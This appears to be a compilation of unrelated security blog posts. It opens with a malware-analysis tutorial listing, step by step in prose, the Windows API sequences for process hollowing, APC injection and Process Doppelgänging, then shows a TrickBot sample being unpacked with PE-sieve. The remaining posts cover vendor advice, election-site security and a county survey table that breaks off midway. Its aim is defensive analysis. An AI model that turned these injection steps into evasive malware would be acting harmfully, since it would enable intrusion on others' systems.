  • CreateRemoteThread for creating a new thread and passed the address of LoadLibraryA as the start address and the address of the DLL file as the parameter for LoadLibraryA function.
Image from HERE

Process Hollowing is a nice and very used trick to evade endpoint security and to inject control floes. The main idea is to build a suspended process within un-mapped memory. Then replace the un-mapped memory section with the shellcode and later on map and start the process. The steps follows:

  • Create a new target process in suspended state. This can be achieve by passing Create_Suspended value in dwCreationFlags parameter of CreateProcess Windows API.
  • Once the process is created in suspended state we will create a new executable section. It wont be bind to any process. This can be done by using ZwCreateSection function.
  • We need to locate the base address of the target process. This can be done by querying the target process using ZwQueryInformationProcess function. We can find the address of the process environment block (PEB) and then use ReadProcessMemory function to read the PEB. Once the PEB is read ReadProcessMemory function is used once again to locate the entry point from the buffer.
  • We need to bind the section to the target process in order to copy the shellcode in it. To achieve this we need to map the section into current process. This can be done by using ZwMapViewOfSection function and passing handle of the current process by using GetCurrentProcess function.
  • Now we will copy each byte of the shellcode into the mapped section which is created in Step 2.
  • Once the shellcode is copied we can proceed to map the section into the target process. This can be done by using ZwMapViewOfSection function and passing handle of the target process.
  • Once the section is mapped we will locate and construct the patch for the target process so that it can our malicious shellcode instead of the original application code.
  • Once the patch is constructed we will use WriteProcessMemory to write the constructed patch into the target process entry point.
  • After writing the constructed patch to the target process entry point we need to resume the thread. This can be achieve by using ResumeThread function.
Image from HERE

Abusing the Asynchronous Procedure Call (APC) is another way to inject shellcode into processes. The way to exploit this Microsoft functionality follows theses teps:

  • Create a new target process in suspended state. This can be achieve by passing Create_Suspended value in dwCreationFlags parameter of CreateProcess Windows API.
  • Once the process is created obtain the handle of the target process using OpenProcess Windows API.
  • Allocate the memory space for our shellcode in the target process using VirtualAllocEX Windows API.
  • Write the shellcode in the allocated memory space using WriteProcessMemory Windows API.
  • Obtain the handle of the primary thread from the target process using OpenThread Windows API.
  • After obtaining the handle of the thread from the target process we will add a user-mode asynchronous procedure call (APC) object to the APC queue of the specified thread using QueueUserAPC Windows API which will point to the memory address of our shellcode.
  • To trigger our shellcode we will resume the suspended thread using ResumeThread Windows API.
Figure from HERE

The last method that I’am going to describe in my personal notes (but there are many more out there) is called: Process Doppelgänging. Quite a recent technique it uses a very little known API for NTFS transactions.

Briefly speaking, we can create a file inside a transaction, and for no other process this file is visible, as long as our transaction is not committed. It can be used to drop and run malicious payloads in an unnoticed way. If we roll back the transaction in an appropriate moment, the operating system behaves like our file was never created.

hasherezade

The process Doppelgänging is a similar technique used to inject control and to evade common AV. It follows these steps:

  • Create a new transaction, using the API CreateTransaction.
  • Create a dummy file to store our payload (CreateFileTransacted).
  • It is used to create a section (a buffer in a special format), which makes a base for our new process.
  • Now it’s time to close it and roll back the transaction (RollbackTransaction).

All these methods are useful to inject payload into memory and to run them keeping a very low rate of detection. Our goal is to intercepts those techniques and to dump the just injected paylaod.

Intercepts these techniques and drop the payload

Now we know the main techniques used by malware to unpack themselves into memory, so we are ready to understand how to hook such functions in order to grab the payload (holding the real behavior). Again there are many techniques to perform that memory extractions, I did change at least 4 workflows until now, but the one I prefer so far is using PE-sieve (download from HERE) to extract injected objects. PE-Sieve is not able to judge the dropped file (are they malicious or not?), so you cannot consider every extracted artifact as a malicious one, you rather need to manually analyze them and express your own assumptions on them.

But let’s start with a practical example. The following image represents a PE file pretending to be a PNG image.

A PE sample pretending to be a .PNG

Looking for sections and import table (IAT) we might observe the samples imports only some of the well-known functions we ‘ve just seen in the previous section (VirtualProtect, GetProcAddress, MoveMemory, etc..) and very often used to unpack malware in memory without touching hard-drive.

Import Table

Even the embedded resources are quite “heavy” which would probably hide some piece of code (??). So … we have a PE file which pretends to be an image, it only imports suspicious functions and it has got a quite heavy resource. Would it be a Malware ?

Looking at resources

Well we do have ideas and suspects but let’s see if it injects pieces of code into the memory and let’s see what they do. Here PE-sieve comes to help us. First of all you need to sacrifice a system :D. Yep, really… you need to run on your target the sample and on the other side you need to run pe-sieve by giving the PID of the suspicious sample. PE-sieve will hook and monitor the previous injection patterns and as soon as it find the right pattern it will drop whatsoever (good files, malicious implant, etc etc) the sample injects. The following image shows the found implants running that sample.

2 Implanted Objects

The dropped files are placed into a directory named with the monitored PID.

Dropped Files

We get some files into that directory. We do have .json report in order to automate results and to wrap them into external projects without using the provided PE-sieve.dll. We have a couple of shellcode (.shc) and three PE. Interesting the 400000.cursor.exe since has 600KB of code and it is executable, and a new ICO different from the original one. Let’s check it’s own property (following image)

Unpacked Property

Now, let’s roll back our scarified VM and run this new file on it. Now let’s check its memory to see if something more is happening there.

Memory from Unpacked one

It looks like we have clear text, no additional encryption/packing stage as shown in memory. We now can follow with classic malware analyses techniques by staging static and dynamic analysis. And, yes, since you are re-scarify your virtual machine, let maximize your effort to grab network traffic and see where it tries to communicate with.

Traffic Analysis

We are facing a nice example of TrickBot version: 1000512 tag: tot793 . The following image shows the same information but coming from the internal systemcall rather then network traces.

Internal Traces

So we nailed it. We’ve just extracted the real payload and later on we figured out it was a TrickBot.

Method 3: The old fashion way (debugger)

Everything can be done from the debugger. You can find the above API patterns by yourself and then follow the System calls and stop and copy whenever you want. you can extract or modify the sample behavior on fly and decide to re-run it as many times you need. Yes, you can, but this would take you a lot of time. Time runs against the economy. More time you need to perform your anlaysis more expensive you are, more expensive you are less customers you could have in both ways: money-wise (expensive = for few ~ cheap = for many) and time-wise (sine you have 24h a day, after that hours you cannot accept more customers). So you would need to mediate between quality/fun and time.

If you are following me since time you would probably remember that I was used to this method years ago, before such a great tools were realized (just few examples: IDA Pro Universal Unpacker or All In Memory CryptoWorm or New way to detect Packers etc..) but today I would not suggest you this method unless you are a student or not a professional Malware analyst.

Securing an Agile and Hybrid Workforce

Guest article by Andrea Babbs, UK General Manager, VIPRE

2020 has forced businesses to revise many of their operations. One significant transition being the shift to a remote working model, for which many were unprepared in terms of equipment, infrastructure and security. As the government now urges people to return to work, we’re already seeing a shift towards a hybrid workforce, with many employees splitting their time between the office and working from home.

As organisations are now reassessing their long-term office strategies, front and centre to that shift needs to be their IT security underpinned by a dependable and flexible cloud infrastructure. Andrea Babbs, UK General Manager, VIPRE, discusses what this new way of working means long-term for an organisation’s IT security infrastructure and how businesses can successfully move from remote working to a secure and agile workforce.

Power of the Cloud
In light of the uncertainty that has plagued most organisations, many are looking to options that can future-proof their business and enable as much continuity as possible in the event of another unforeseen event. The migration of physical servers to the Cloud is therefore a priority, not only to facilitate agile working, but to provide businesses with greater flexibility, scalability and more efficient resources. 

COVID-19 accelerated the shift towards Cloud-based services, with more data than ever before now being stored in the Cloud. For those organisations working on Cloud-based applications and drives, the challenges of the daily commute, relocations for jobs and not being able to ‘access the drive’ are in the past for many. Cloud services are moving with the user – every employee can benefit from the same level of security no matter where they are working or which device they are using. However, it’s important to ensure businesses are taking advantage of all the features included in their Cloud subscriptions, and that they’re configured securely for hybrid working. 

Layered Security Defence
Cloud-powered email, web and network security will always underline IT security defences, but these are only the first line of defence. Additional layers of security are also required to help the user understand the threat landscape, both external and internal. Particularly when working remotely with limited access to IT support teams, employees must be ready to question, verify the authenticity and interrogate the risk level of potential phishing emails or malicious links. 

With increased pressure placed on users to perform their roles faster and achieve greater results than ever before, employees will do what it takes to power through and access the information they need in the easiest and quickest way possible. This is where the cloud has an essential role to play in making this happen, not just for convenience and agility but also to allow users to stay secure – enabling secure access to applications for all devices from any location and the detection and deletion of viruses – before they reach the network. 

Email remains the most-used communication tool, even more so when remote working, but it also remains the weakest link in IT security, with 91%of cybercrimes beginning with an email. By implementing innovative tools that prompt employees to double-check emails before they send them, it can help reduce the risk of sharing the wrong information with the wrong individual. 

Additional layers of defence such as email checking tools, are removing the barriers which slow the transition to agile working and are helping to secure our new hybrid workforce, regardless of the location they’re working in, or what their job entails. 

Educating the User
The risk an individual poses to an organisation can often be the main source of vulnerability in a company’s IT infrastructure. When remote working became essential overnight, businesses faced the challenges of malware spreading from personal devices, employees being distracted and exposing incorrect information and an increase in COVID-related cyber-attacks. 

For organisations wanting to evolve into a hybrid work environment, their IT security policies need to reflect the new reality. By re-educating employees about existing products and how to leverage any additional functionality to support their decision making, users can be updated on these cyber risks and understand their responsibilities.

Security awareness training programmes teach users to be alert and more security conscious as part of the overall IT security strategy. In order to fully mitigate IT security risks and for the business to benefit from an educated workforce, both in the short and long term, employees need to change their outdated mindset. 

Changing the Approach
The evolution of IT and security over the past 20 years means that working from home is now easily achievable with cloud-based setups, whereas in the not too distant past, it would have been impossible. But the key to a successful and safe agile workforce is to shift the approach of full reliance on IT, to a mindset where everyone is alert, responsible, empowered and educated with regular training, backed up by tools that reinforce a ‘security first’ approach. 

IT departments cannot be expected to stay one step ahead of cybercriminals and adapt to new threats on their own. They need their colleagues to work mindfully and responsibly on the front lines of cyber defence, comfortable in the knowledge that everything they do is underpinned by a robust and secure IT security infrastructure, but that the final decision to click the link, send the sensitive information or download the file, lies with them. 

Conclusion
As employees prove they can work from home productively, the role of the physical office is no longer necessary. For many companies, it is a sink or swim approach when implementing a hybrid and agile workforce. Introducing and retaining flexibility in operations now will help organisations cope better with any future unprecedented events or crises.

By focusing on getting the basics right and powered by the capabilities of the Cloud, highlighting the importance of layered security and challenging existing mindsets, businesses will be able to shift away from remote workers being the ‘exception,’ to a secure and agile workforce as a whole.

5 Lessons About Software Security for Cybersecurity Awareness Month

October is cybersecurity awareness month, and this year, the overarching theme is ???Do Your Part. #BeCyberSmart.??? When considering what ???cybersmart??? means in application security, we realized we unearthed some data this year that made us a little cybersmarter and could help other security professionals and developers increase their AppSec smarts as well. We???re sharing those data gems below.

1. Lack of developer participation in and engagement with security training is a problem.

A recent research report, sponsored by Veracode and conducted by Enterprise Strategy Group (ESG), found that most organizations require their developers to consume AppSec training, but 35 percent said less than half of development teams are participating in formal training. In addition, most respondents reported that they lack programs to measure the effectiveness of developer security training. What???s the lesson here? Given that developers have been increasingly tasked with implementing security measures, including writing secure code and remediating vulnerabilities, it???s vital that they are trained to do so. But it has to be relevant, engaging training that will encourage participation.

2. It???s nearly impossible to have effective AppSec without integrating into developer workflows.

In the ESG survey, 43 percent of organizations agreed that DevOps integration is critical to improving application security (AppSec) programs. With the speed of development today, security tests that slow or block developers are simply not feasible. Lesson No. 2: AppSec should be integrated and automated. Integrating security measures into the CI/CD toolchain not only makes it easier for developers to run AppSec tests, but it also helps organizations discover security issues sooner, which speeds up time to deployment.

3. Open source code is pervasive, vulnerable, and typically not checked for security.

Our most recent State of Software Security (SOSS) report found that a typical Java application is made up of 97 percent open source and third-party libraries. In addition, our State of Software Security: Open Source Edition report published this year found that 70.5 percent of applications have a security flaw in an open source library. But ??? shockingly ??? the ESG report referenced above found that less than 50 percent of organizations scan their open source libraries for security. Why? It???s not uncommon for application developers to assume that third-party libraries were already scanned for vulnerabilities by library developers. Unfortunately, you can???t rely on library developers to keep your applications safe. The cybersmart practice is to scan third-party libraries on a regular basis.

4. You could be pulling in more open source code than you think.

Developers pull in one open source library, but that library is dependent on another library, which is dependent on another library, and so on. In fact, research for our State of Software Security: Open Source Edition report found that most applications have a large percentage of secondary (and tertiary, and more) dependencies.

Take a look at the image below taken from our Software Composition Analysis solution. The empty circle in the middle is your application, and all of the sections around it are different direct and indirect libraries. In this specific example, all of the colored sections are libraries containing vulnerabilities that affect the application either directly or indirectly. Bottom line: Get a handle on all the code that makes up your applications, even the open source code reaching your app indirectly.

software composition analysis

5. The majority of open source flaws are pulled into the code indirectly.

As mentioned above, flaws can be introduced into code directly by the application developer or indirectly by another library in use. And flaws introduced indirectly, known as transitive dependencies, make up the majority of open source flaws. In fact, in our recent report, State of Software Security: Open Source Edition, we found that 70.5 percent of the applications had an open source flaw, and of those applications, 46.6 percent of the flaws were transitive, and 41.9 percent were direct (11.5 percent were both).

Direct and transitive dependencies

Takeaway: You can have vulnerabilities lurking several layers deep; don???t be complacent if you???re just assessing the security of your direct dependencies.

Learn more

#BeCyberSmart about application security, this month and every month. To learn more, watch this short video. ツ?

ツ?

Election 2020 – Fake Election Websites: Five Tips So You Don’t Get Fooled

Protect Your Vote

Election 2020 – Fake Election Websites: Five Tips So You Don’t Get Fooled

When you spot a .GOV web domain tacked onto the end of a U.S. election website, that’s a strong sign you can turn to it for trustworthy election information. However, the overwhelming majority of local county election websites fail to use the .GOV domain.

Recent research by McAfee found that more than 80% of the 3,089 county election administration websites in the U.S. don’t use a .GOV domain.  The concern behind that stat is this: the lack of .GOV domain usage could allow bad actors to create fake election websites—which could in turn spread disinformation about the election and potentially hamper your ability to cast a valid ballot.

Moreover, nearly 45% of those 3,089 sites fail to use HTTPS encryption, a security measure which can further prevent bad actors from re-directing voters to fake websites that can misinform them and potentially steal their personal information.

And it appears that a number of fake sites have cropped up already.

Let’s take a closer look at what’s happening and what you can do to protect your vote.

Why .GOV domains matter

Not anyone can get a .GOV domain. It requires buyers to submit evidence to the U.S. government that they represent a legitimate government entity, such as a local, county, or state election administrative body. Thus, .GOV sites are quite difficult to fake.

Compare that to elections site that use publicly available domains like .COM, .ORG, and .US. A bad actor could easily create fake election sites by purchasing a URL with a similar or slightly mis-typed name to the legitimate election site—a practice known as typosquatting—and use it spread false information.

A rise in fake election sites?

Typosquatted election sites are more than a theory. Just this August, it was reported that the Federal Bureau of Investigation (FBI) and Department of Homeland Security (DHS) issued a warning bulletin to election officials that stated, ““The FBI between March and June 2020 identified suspicious typosquatting of U.S. state and federal election domains, according to recent FBI reporting from a collaborative source.”

And just last week, the Feds issued another warning about the risk of fake websites exploiting the lack of .GOV in the names of election websites.

What makes this approach of mimicry and typosquatting so attractive to bad actors? Rather than clear the much more difficult hurdle of meddling with ballots and other vote-tabulating infrastructure, bad actors can take the relatively easier route of faking websites that pass along incorrect voter information, all in an effort to keep people from casting a valid vote in the first place.

Protect your vote

While we have no direct control over the use of the .GOV domain and HTTPS encryption by our local election sites, there are still steps we can take to protect our vote. Here’s what you can do:

  1. Stay informed. Check that the site you’re visiting is a .GOV website and that HTTPS security protection is in place to ensure your security. If your local site is one of the many that does not use one, the other, or both, contact your local officials to confirm any election instructions you receive. gov provides an excellent resource for this as does the U.S. Election Assistance Commission.
  2. Look out for suspicious emails. Scrutinize all election-related emails you receive. An attacker could use time-tested phishing techniques to misinform you with emails that can sometimes look strikingly legitimate. Check this blog for tips on how to spot such phishing attacks.
  1. Trust official voting literature. The U.S. Postal Service is the primary channel state and local governments use to send out voting information. Look to those printed materials for proper information. However, be sure to validate the polling information you find in them as well—such as with a visit this list of polling places by state compiled by Vote.org.
  2. Steer clear of social media. It’s quite easy for bad actors to spread bad information by setting up phony social media groups or profiles. For more on spotting fake news in your social media feed and election misinformation, check out my recent blogs on those topics.
  3. Protect yourself and your devices. Using strong security software that protects your computers, tablets, and smartphones will help prevent phishing attacks, block links to suspicious sites, and help protect your privacy and identity. Also, disable pop-ups in your browser. Together, these will offer a line of defense against attempts to steer you toward a phony election site.

Stay Updated 

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Election 2020 – Fake Election Websites: Five Tips So You Don’t Get Fooled appeared first on McAfee Blogs.

Cyber Security Awareness: A Critical Checklist

October 2020 marks the 17th year of National CyberSecurity Awareness Month, where users and organizations are encouraged to double their efforts to be aware of cybersecurity issues in all their digital dealings—and to take concrete steps to increase their privacy and security as necessary. The Cybersecurity & Infrastructure Security Agency (CISA), in conjunction with the National Cyber Security Alliance (NCSA) has announced a four-week security strategy under the theme “Do Your Part. #BeCyberSmart”. (You can use the NCSAM hashtag #BeCyberSmart during October to promote your involvement in raising cybersecurity awareness.) Their schedule includes the following:

 

 

  • Week of October 5 (Week 1):If You Connect It, Protect It
  • Week of October 12 (Week 2):Securing Devices at Home and Work
  • Week of October 19 (Week 3):Securing Internet-Connected Devices in Healthcare
  • Week of October 26 (Week 4):The Future of Connected Devices

Here in Trend Micro’s Consumer Division, we’d like to do our part by providing a breakdown of the security issues you should be aware of as you think about cybersecurity—and to give you some tips about what you can do to protect yourself and your family while working, learning, or gaming at home. To help, we’ve also taken a look back at articles we’ve written recently to address each category of threat—and to provide some quick links to access our library of relevant blogs all in a single place.

The range of threats

As you think about potential threats during Cybersecurity Awareness Month and beyond, keep in mind our basic breakdown of where and how threats arise, which we outlined at the beginning of the year in our Everyday Cyber Threat Landscape blog. An updated summary is given here:

Home network threats: Our homes are increasingly powered by online technologies. Over two-thirds (69%) of US households now own at least one smart home device: everything from voice assistant-powered smart speakers to home security systems and connected baby monitors. But gaps in protection can expose them to hackers. There were an estimated 105m smart home attacks in the first half of 2019 alone. With home routers particularly at risk, it’s a concern that 83% are vulnerable to attack. In the first half of 2020, Trend Micro detected over 10.6 billion suspicious connection attempts on home routers’ unavailable ports—an issue made more worrisome by recent lab-based evidence that home routers are riddled with insecurities, as the Fraunhofer Home Router Security Report 2020 shows. This means you need to take steps to mitigate your router’s weaknesses, while deploying a home network security solution to address other network insecurities and to further secure your smart devices.

Relevant Blogs:

Endpoint threats: These are attacks aimed squarely at you the user, usually via the email channel. Trend Micro detected and blocked more than 26 billion email threats in the first half of 2019, nearly 91% of the total number of cyber-threats. These included phishing attacks designed to trick you into clicking on a malicious link to steal your personal data and log-ins or begin a ransomware download. Or they could be designed to con you into handing over your personal details, by taking you to legit-looking but spoofed sites. Endpoint threats sometimes include social media phishing messages or even legitimate websites that have been booby-trapped with malware. All this means is that installing endpoint security on your PCs and Macs is critical to your safety.

Relevant Blogs:

Mobile security threats: Hackers are also targeting our smartphones and tablets with greater sophistication. Malware is often unwittingly downloaded by users, since it’s hidden in normal-looking mobile apps, like the Agent Smith adware that infected over 25 million Android handsets globally in 2019. Users are also extra-exposed to social media attacks and those leveraging unsecured public Wi-Fi when using their devices. Once again, the end goal for the hackers is to make money: either by stealing your personal data and log-ins; flooding your screen with adverts; downloading ransomware; or forcing your device to contact expensive premium rate phone numbers that they own. The conclusion? Installing a mobile security solution, as well as personal VPN, on your Android or iOS device, should be part of your everyday security defense.

Relevant Blogs:

Identity data breaches are everywhere: The raw materials needed to unlock your online accounts and help scammers commit identity theft and fraud are stored by the organizations you interact with online. Unfortunately, these companies continued to be targeted by data thieves in 2019. As of November 2019, there were over 1,200 recorded breaches in the US, exposing more than 163 million customer records. Even worse, hackers are now stealing card data direct from the websites you shop with as they are entered in, via “digital skimming” malware. That said, an increasingly popular method uses automated tools that try tens of thousands of previously breached log-ins to see if any of them work on your accounts. From November 2017 through the end of March 2019, over 55 billion such attacks were detected. Add these to the classical phishing attack, where email hoaxes designed to get you to unwittingly hand over your data—and your data and identity can be severely compromised. In this category, using both a password manager and an identity security monitoring solution, is critical for keeping your identity data safe as you access your online accounts.

Relevant Blogs:

How Trend Micro can help

Trend Micro fully understands these multiple sources for modern threats, so it offers a comprehensive range of security products to protect all aspects of your digital life—from your smart home network to your PCs and Macs, and from your mobile devices to your online accounts. We also know you need security for your email and your social networks, or simply when browsing the web itself.

Trend Micro Home Network Security: Provides protection against network intrusions, router hacks, web threats, dangerous file downloads and identity theft for every device connected to the home network.

Trend Micro Premium Security Suite: Our new premium offering provides all of the products listed below for up to 10 devices, plus Premium Services by our highly trained pros. It includes 24×7 technical support, virus and spyware removal, a PC security health check, and remote diagnosis and repair. As always, however, each solution below can be purchased separately, as suits your needs.

  • Trend Micro Security:Protects your PCs and Macs against web threats, phishing, social network threats, data theft, online banking threats, digital skimmers, ransomware and other malware. Also guards against over-sharing on social media.
  • Trend Micro Mobile Security:Protects against malicious app downloads, ransomware, dangerous websites, and unsafe Wi-Fi networks.
  • Trend Micro Password Manager:Provides a secure place to store, manage and update your passwords. It remembers your log-ins, enabling you to create long, secure and unique credentials for each site/app you need to sign-in to.
  • Trend Micro WiFi Protection:Protects you on unsecured public WiFi by providing a virtual private network (VPN) that encrypts your traffic and ensures protection against man-in-the-middle (MITM) attacks.
  • Trend Micro ID Security (AndroidiOS): Monitors underground cybercrime sites to securely check if your personal information is being traded by hackers on the Dark Web and sends you immediate alerts if so, so you can take steps to address the problem.

The post Cyber Security Awareness: A Critical Checklist appeared first on .

NIST Cybersecurity Expert Donna Dodson Receives Service to America Medal

Donna Dodson, a cybersecurity expert who worked for her entire 33-year career at the National Institute of Standards and Technology (NIST), has been honored this week with a Samuel J. Heyman Service to America Medal for her numerous contributions to the field. Since 2002, the Partnership for Public Service has awarded “Sammies” medals to honor outstanding civil servants. One of just 11 winners chosen from a pool of more than 350 nominations, Dodson received her medal in the Safety, Security and International Affairs category. “Donna Dodson demonstrates the profound impact that a single

ZecOps for Mobile DFIR 2.0 – Now Supporting iOS *AND* Android

ZecOps for Mobile DFIR 2.0 – Now Supporting iOS *AND* Android

ZecOps is excited to announce the release of ZecOps for Mobile 2.0, which includes full support for Android. With this release, ZecOps has extended its best-in-class automatic digital forensics capabilities to the two most widespread and important mobile operating systems in the world, iOS and Android.

We see it in the news everyday: sophisticated threat actors can bypass all existing security defenses. These mistakes lead to sudden reboots, crashes, appearances in logs / OS telemetry, bugs, errors, battery loss, and other “unexplained” anomalies. ZecOps for Mobile analyzes the associated events against databases of attack techniques, common weaknesses (CWEs), and common vulnerabilities (CVEs). ZecOps’s core technology utilizes machine learning for insights, correlation and identifying anomalous behavior for 0-day attacks. Following a quick investigation, ZecOps produces a detailed assessment of if, when, and how a mobile device has been compromised.

World-leading governments, defense agencies, enterprises, and VIPs rely on ZecOps to automate their advanced investigations, greatly improving their threat intelligence, threat detection, APT hunting, and risk & compromise assessment capabilities. With support for Android, ZecOps can now extend this threat intelligence across an entire organization’s mobile footprint.

Supported versions:

  • Android 8 and above – until latest
  • iOS 10 and above – until latest

Supported HW Models:

  • All device models are supported on both Android and iOS.

ZecOps provides the most thorough operating system telemetry analysis as part of its advanced digital forensics. By focusing on the trails that hackers leave (“Attackers’ Mistakes”), ZecOps can provide sophisticated security organizations with critical information on the attackers’ tools, advanced persistent threats, and even discovery of attacks leveraging zero-day vulnerabilities.

Election 2020 – Keep Misinformation from Undermining the Vote

Protect Your Vote

Election 2020 – Keep Misinformation from Undermining the Vote

On September 22nd, the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) issued an advisory about the potential threat from foreign actors and cybercriminals attempting to spread false information. Their joint public service announcement makes a direct statement regarding how this could affect our election:

“Foreign actors and cybercriminals could create new websites, change existing websites, and create or share corresponding social media content to spread false information in an attempt to discredit the electoral process and undermine confidence in U.S. democratic institutions.”

Their call to action is clear—critically evaluate the content you consume and to seek out reliable and verified information from trusted sources, such as state and local election officials. Not just leading up to Election Day, but during and after as well.

Here’s why: it’s estimated that roughly 75% of American voters will be eligible to vote by mail, potentially leading to some 80 million mail-in ballots being cast. That’s twice the number from the 2016 presidential election, which could prolong the normal certification process. Election results will likely take days, even weeks, to ensure every legally cast ballot is counted accurately so that the election results can ultimately get certified.

That extended stretch of time is where the concerns come in. Per the FBI and CISA:

“Foreign actors and cybercriminals could exploit the time required to certify and announce elections’ results by disseminating disinformation that includes reports of voter suppression, cyberattacks targeting election infrastructure, voter or ballot fraud, and other problems intended to convince the public of the elections’ illegitimacy.”

In short, bad actors may attempt to undermine people’s confidence in our election as the results come in.

Our moment to act as smart consumers, and sharers, of online news has never been more immediate.

Misinformation flies quicker, and farther, than the truth

Before we look at how we can combat the spread of false information this election, let’s see how it cascades across the internet.

It’s been found that false political news traveled deeper and more broadly, reached more people, and was more viral than any other category of false information, according to a Massachusetts Institute of Technology study on the spread of true and false news online, which was published by Science in 2018.

Why’s that so? In a word: people. According to the research findings,

“We found that false news was more novel than true news, which suggests that people were more likely to share novel information … Contrary to conventional wisdom, robots accelerated the spread of true and false news at the same rate, implying that false news spreads more than the truth because humans, not robots, are more likely to spread it.”

Thus, bad actors pick their topics, pumps false information about them into social media channels, and then lets people spread it by way of shares, retweets, and the like—thanks to “novel” and click-baity headlines for content people may not even read or watch, let alone fact check.

Done on a large scale, false information thus can hit millions of feeds, which is what the FBI and CISA is warning us about.

Five ways you can combat the spread of false information this election

The FBI and CISA recommend the following:

  1. Seek out information from trustworthy sources, such as state and local election officials; verify who produced the content; and consider their intent.
  2. Verify through multiple reliable sources any reports about problems in voting or election results and consider searching for other reliable sources before sharing such information via social media or other avenues.
  3. For information about final election results, rely on state and local government election officials.
  4. Report potential election crimes—such as disinformation about the manner, time, or place of voting—to the FBI.
  5. If appropriate, make use of in-platform tools offered by social media companies for reporting suspicious posts that appear to be spreading false or inconsistent information about election-related problems or results.

Stick to trustworthy sources

If there’s a common theme across our election blogs so far, it’s trustworthiness.

Knowing which sources are deserving of our trust and being able to spot the ones that are not takes effort—such as fact-checking from reputable sources like FactCheck.org, the Associated Press, and Reuters or researching the publisher of the content in question to review their credentials. Yet that effort it worthwhile, even necessary today. The resources listed in my recent blogs can help:

Stay Updated 

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

 

The post Election 2020 – Keep Misinformation from Undermining the Vote appeared first on McAfee Blogs.

US County Election Websites (Still) Fail to Fulfill Basic Security Measures

Elections 2020

In January 2020, McAfee released the results of a survey establishing the extent of the use of .GOV validation and HTTPS encryption among county government websites in 13 states projected to be critical in the 2020 U.S. Presidential Election. The research was a result of  my concern that the lack of .GOV and HTTPS among county government websites and election-specific websites could allow foreign or domestic malicious actors to potentially create fake websites and use them to spread disinformation in the final weeks and days leading up to Election Day 2020.

Subsequently, reports emerged in August that the U.S. Federal Bureau of Investigations, between March and June, had identified dozens of suspicious websites made to look like official U.S. state and federal election domains, some of them referencing voting in states like Pennsylvania, Georgia, Tennessee, Florida and others.

Just last week, the FBI and Department of Homeland Security released another warning about fake websites taking advantage of the lack of .GOV on election websites.

These revelations compelled us to conduct a follow-up survey of county election websites in all 50 U.S. states.

Why .GOV and HTTPS Matter

Using a .GOV web domain reinforces the legitimacy of the site. Government entities that purchase .GOV web domains have submitted evidence to the U.S. government that they truly are the legitimate local, county, or state governments they claimed to be. Websites using .COM, .NET, .ORG, and .US domain names can be purchased without such validation, meaning that there is no governing authority preventing malicious parties from using these names to set up and promote any number of fraudulent web domains mimicking legitimate county government domains.

An adversary could use fake election websites for disinformation and voter suppression by targeting specific citizens in swing states with misleading information on candidates or inaccurate information on the voting process such as poll location and times. In this way, a malicious actor could impact election results without ever physically or digitally interacting with voting machines or systems.

The HTTPS encryption measure assures citizens that any voter registration information shared with the site is encrypted, providing greater confidence in the entity with which they are sharing that information. Websites lacking the combination of .GOV and HTTPS cannot provide 100% assurance that voters seeking election information are visiting legitimate county and county election websites. This leaves an opening for malicious actors to steal information or set up disinformation schemes.

I recently demonstrated how such a fake website would be created by mimicking a genuine county election website and then inserting misleading information that could influence voter behavior. This was done in an isolated lab environment that was not accessible to the internet as to not create any confusion for legitimate voters.

In many cases, election websites have been set up to provide a strong user experience versus a focus on mitigating concerns that they could be spoofed to exploit the communities they serve. Malicious actors can pass off fake election websites and mislead large numbers of voters before detection by government organizations. A campaign close to election day could confuse voters and prevent votes from being cast, resulting in missing votes or overall loss of confidence in the democratic system.

September 2020 Survey Findings

McAfee’s September survey of county election administration websites in all 50 U.S. states (3089 counties) found that 80.2% of election administration websites or webpages lack the .GOV validation that confirms they are the websites they claim to be.

Nearly 45% of election administration websites or webpages lack the necessary HTTPS encryption to prevent third-parties from re-directing voters to fake websites or stealing voter’s personal information.

Only 16.4% of U.S. county election websites implement U.S. government .GOV validation and HTTPS encryption.

States # Counties # .GOV % .GOV # HTTPS % HTTPS # BOTH %BOTH
Alabama 67 8 11.9% 26 38.8% 6 9.0%
Alaska 18 1 5.6% 12 66.7% 1 5.6%
Arizona 15 11 73.3% 14 93.3% 11 73.3%
Arkansas 75 18 24.0% 30 40.0% 17 22.7%
California 58 8 13.8% 45 77.6% 6 10.3%
Colorado 64 21 32.8% 49 76.6% 20 31.3%
Connecticut 8 1 12.5% 2 25.0% 1 12.5%
Delaware 3 0 0.0% 0 0.0% 0 0.0%
Florida 67 4 6.0% 64 95.5% 4 6.0%
Georgia 159 40 25.2% 107 67.3% 35 22.0%
Hawaii 5 4 80.0% 4 80.0% 4 80.0%
Idaho 44 6 13.6% 28 63.6% 5 11.4%
Illinois 102 14 13.7% 60 58.8% 12 11.8%
Indiana 92 28 30.4% 41 44.6% 16 17.4%
Iowa 99 27 27.3% 80 80.8% 25 25.3%
Kansas 105 8 7.6% 46 43.8% 2 1.9%
Kentucky 120 19 15.8% 28 23.3% 15 12.5%
Louisiana 64 5 7.8% 12 18.8% 2 3.1%
Maine 16 0 0.0% 0 0.0% 0 0.0%
Maryland 23 9 39.1% 22 95.7% 8 34.8%
Massachusetts 14 3 21.4% 5 35.7% 2 14.3%
Michigan 83 9 10.8% 63 75.9% 9 10.8%
Minnesota 87 5 5.7% 59 67.8% 5 5.7%
Mississippi 82 8 9.8% 30 36.6% 5 6.1%
Missouri 114 8 7.0% 49 43.0% 7 6.1%
Montana 56 15 26.8% 21 37.5% 8 14.3%
Nebraska 93 35 37.6% 73 78.5% 32 34.4%
Nevada 16 3 18.8% 13 81.3% 2 12.5%
New Hampshire 10 0 0.0% 0 0.0% 0 0.0%
New Jersey 21 3 14.3% 11 52.4% 2 9.5%
New Mexico 33 7 21.2% 20 60.6% 6 18.2%
New York 62 15 24.2% 48 77.4% 14 22.6%
North Carolina 100 37 37.0% 69 69.0% 29 29.0%
North Dakota 53 3 5.7% 19 35.8% 2 3.8%
Ohio 88 77 87.5% 88 100.0% 77 87.5%
Oklahoma 77 1 1.3% 24 31.2% 1 1.3%
Oregon 36 1 2.8% 22 61.1% 0 0.0%
Pennsylvania 67 11 16.4% 40 59.7% 7 10.4%
Rhode Island 5 2 40.0% 3 60.0% 0 0.0%
South Carolina 46 15 32.6% 33 71.7% 13 28.3%
